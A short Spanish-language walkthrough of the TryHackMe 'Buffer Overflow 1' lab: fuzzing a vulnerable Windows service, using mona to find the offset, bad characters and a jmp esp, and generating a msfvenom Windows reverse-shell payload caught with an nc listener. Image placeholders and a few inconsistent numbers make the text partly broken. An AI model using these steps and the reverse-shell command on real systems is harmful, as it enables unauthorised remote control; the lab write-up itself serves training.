TryHackMe Buffer Overflow1

TryHackMe Buffer Overflow1


Linux

Estos son los pasos que seguimos en BufferOverflow1 de TryHackMe

Buscamos el archivo oscp.exe y corremos Immunity Debugger

ssh_command.)

nc 10.10.23.179 1337

ssh_command.)

Creamos y corremos un script llamado fuzzer.py

python3 fuzzer.py

ssh_command.)

Vemos que el ultimo numero de bytes que se enviaron fueron 1300.

/usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 2400

El numero es mayor a 1300 y por eso usamos 1600. Esto genera un payload que lo copiamos al script en exploit.py

ssh_command.)

python3 exploit.py

ssh_command.)

En Immunity Debugger corremos lo siguiente

!mona config -set workingfolder c:\mona%p ssh_command.)

!mona findmsp -distance 2400

ssh_command.)

ssh_command.)

!mona bytearray -b “\x00”

ssh_command.)

ssh_command.)

!mona compare -f C:\mona\oscp\bytearray.bin -a

ssh_command.)

ssh_command.)

!mona bytearray -b “\x00\x07” Reiniciamos la aplicacion

Antes tenia el x07

ssh_command.)

Ahora le quitamos el x07

ssh_command.)

python3 exploit.py

ssh_command.)

!mona compare -f C:\mona\oscp\bytearray.bin -a

ssh_command.)

ssh_command.)

!mona bytearray -b \x00\x07\x2e\xa0”

ssh_command.)

Quitamos x2e y x0af

python3 exploit.py

!mona compare -f C:\mona\oscp\bytearray.bin -a

ssh_command.)

!mona jmp -r esp -cpb “\x00\x07\x2e\xa0”

Hacemos esto con los caracteres malos que salieron Nos vamos a la ventana de logs

ssh_command.)

ssh_command.)

Modificamos el payload y retn

Reiniciamos la aplicacion

python3 exploit.py

msfvenom -p windows/shell_reverse_tcp LHOST=YOUR_IP LPORT=4444 EXITFUNC=thread -b “\x00\x07\x2e\xa0” -f c

padding = “\x90” * 16 Cambiamos esto en el script

ssh_command.)

nc -lvnp 4444

© 2025 Cu3rv0x